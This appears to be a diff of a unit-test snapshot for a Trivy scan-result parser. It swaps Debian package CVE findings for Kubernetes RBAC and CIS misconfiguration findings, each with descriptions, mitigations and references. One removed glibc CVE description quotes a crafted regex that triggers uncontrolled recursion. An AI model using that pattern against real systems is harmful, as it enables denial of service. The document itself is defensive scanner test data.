"Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replication-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:resourcequota-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:resourcequota-controller", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:root-ca-cert-publisher' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:root-ca-cert-publisher", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'system:controller:root-ca-cert-publisher' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:kube-controller-manager' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:kube-controller-manager' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-scheduler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-scheduler", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:kube-scheduler' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1304", - "installedVersion": "1.46.2-2", - "packageName": "libcom-err2", + "foundIn": "Target: 'ClusterRole/system:kube-scheduler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2022:8361", - "https://access.redhat.com/security/cve/CVE-2022-1304", - "https://bugzilla.redhat.com/2069726", - "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", - "https://errata.almalinux.org/9/ALSA-2022-8361.html", - "https://errata.rockylinux.org/RLSA-2022:8361", - "https://linux.oracle.com/cve/CVE-2022-1304.html", - "https://linux.oracle.com/errata/ELSA-2022-8361.html", - "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", - "https://ubuntu.com/security/notices/USN-5464-1", - "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, - "category": "Vulnerability", - "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-scheduler", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:kube-scheduler' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1304", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8361", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:node' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:node", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1304", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2069726", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRoleBinding/admin-user' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV111", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv111", + ], + }, + "category": "Misconfiguration", + "description": "The RBAC role cluster-admin provides wide-ranging powers over the environment and should be used only where and when needed.", + "location": "scb://trivy/?Kind=ClusterRoleBinding&Name=admin-user", + "mitigation": "Identify all clusterrolebindings to the cluster-admin role. Check if they are used and if they need this role or if they could use a role with fewer privileges.", + "name": "Ensure that the cluster-admin role is only used where required(ClusterRoleBinding 'admin-user' with role 'cluster-admin' should be used only when required)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "value": "https://avd.aquasec.com/misconfig/ksv111", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRoleBinding/trivy-k8s' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV111", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv111", + ], + }, + "category": "Misconfiguration", + "description": "The RBAC role cluster-admin provides wide-ranging powers over the environment and should be used only where and when needed.", + "location": "scb://trivy/?Kind=ClusterRoleBinding&Name=trivy-k8s", + "mitigation": "Identify all clusterrolebindings to the cluster-admin role. Check if they are used and if they need this role or if they could use a role with fewer privileges.", + "name": "Ensure that the cluster-admin role is only used where required(ClusterRoleBinding 'trivy-k8s' with role 'cluster-admin' should be used only when required)", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "value": "https://avd.aquasec.com/misconfig/ksv111", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8361", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0056", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that the container network interface file has permissions of 600 or more restrictive.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the container network interface file path/to/cni/files permissions of 600 or more restrictive ", + "name": "Ensure that the container network interface file permissions are set to 600 or more restrictive(Ensure that the Container Network Interface specification file permissions is set to 600 or more restrictive)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", + "value": "https://avd.aquasec.com/misconfig/kcv0056", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0059", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0059", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that the etcd data directory ownership is set to etcd:etcd.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the etcd data directory /var/lib/etcd ownership to etcd:etcd", + "name": "Ensure that the etcd data directory ownership is set to etcd:etcd(Ensure that the etcd data directory ownership is set to etcd:etcd)", + "references": [ { "type": "URL", - "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "value": "https://avd.aquasec.com/misconfig/kcv0059", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0068", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0068", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that the Kubernetes PKI certificate file permission is set to 600.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the Kubernetes PKI certificate file /etc/kubernetes/pki/*.crt permission to 600", + "name": "Ensure that the Kubernetes PKI certificate file permission is set to 600(Ensure that the Kubernetes PKI certificate file permission is set to 600)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5464-1", + "value": "https://avd.aquasec.com/misconfig/kcv0068", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "7.74.0-1.3+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-32221", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0069", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://seclists.org/fulldisclosure/2023/Jan/19", - "http://seclists.org/fulldisclosure/2023/Jan/20", - "http://www.openwall.com/lists/oss-security/2023/05/17/4", - "https://access.redhat.com/errata/RHSA-2023:0333", - "https://access.redhat.com/security/cve/CVE-2022-32221", - "https://bugzilla.redhat.com/2135411", - "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", - "https://curl.se/docs/CVE-2022-32221.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", - "https://errata.almalinux.org/9/ALSA-2023-0333.html", - "https://errata.rockylinux.org/RLSA-2023:0333", - "https://hackerone.com/reports/1704017", - "https://linux.oracle.com/cve/CVE-2022-32221.html", - "https://linux.oracle.com/errata/ELSA-2023-0333.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", - "https://security.gentoo.org/glsa/202212-01", - "https://security.netapp.com/advisory/ntap-20230110-0006/", - "https://security.netapp.com/advisory/ntap-20230208-0002/", - "https://support.apple.com/kb/HT213604", - "https://support.apple.com/kb/HT213605", - "https://ubuntu.com/security/notices/USN-5702-1", - "https://ubuntu.com/security/notices/USN-5702-2", - "https://ubuntu.com/security/notices/USN-5823-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32221", - "https://www.debian.org/security/2023/dsa-5330", + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0069", ], }, - "category": "Vulnerability", - "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "POST following PUT confusion", + "category": "Misconfiguration", + "description": "Ensure that the kubelet service file has permissions of 600 or more restrictive.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the kubelet service file /etc/systemd/system/kubelet.service.d/10-kubeadm.conf permissions of 600 or more restrictive ", + "name": "Ensure that the kubelet service file permissions are set to 600 or more restrictive(Ensure that the kubelet service file permissions are set to 600 or more restrictive)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32221", + "value": "https://avd.aquasec.com/misconfig/kcv0069", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/19", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0075", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0075", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that the certificate authorities file has permissions of 600 or more restrictive.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the certificate authorities file permissions to 600 or more restrictive if exist", + "name": "Ensure that the certificate authorities file permissions are set to 600 or more restrictive(Ensure that the certificate authorities file permissions are set to 600 or more restrictive)", + "references": [ { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/20", + "value": "https://avd.aquasec.com/misconfig/kcv0075", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0077", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0077", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that if the kubelet refers to a configuration file with the --config argument, that file has permissions of 600 or more restrictive.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the kubelet config yaml permissions to 600 or more restrictive if exist", + "name": "If the kubelet config.yaml configuration file is being used validate permissions set to 600 or more restrictive(Ensure that if the kubelet refers to a configuration file with the --config argument, that file has permissions of 600 or more restrictive.)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0333", + "value": "https://avd.aquasec.com/misconfig/kcv0077", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32221", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "HIGH", + }, +] +`; + +exports[`should parse a trivy-k8s scan result 1`] = ` +[ + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2135411", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://curl.se/docs/CVE-2022-32221.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", 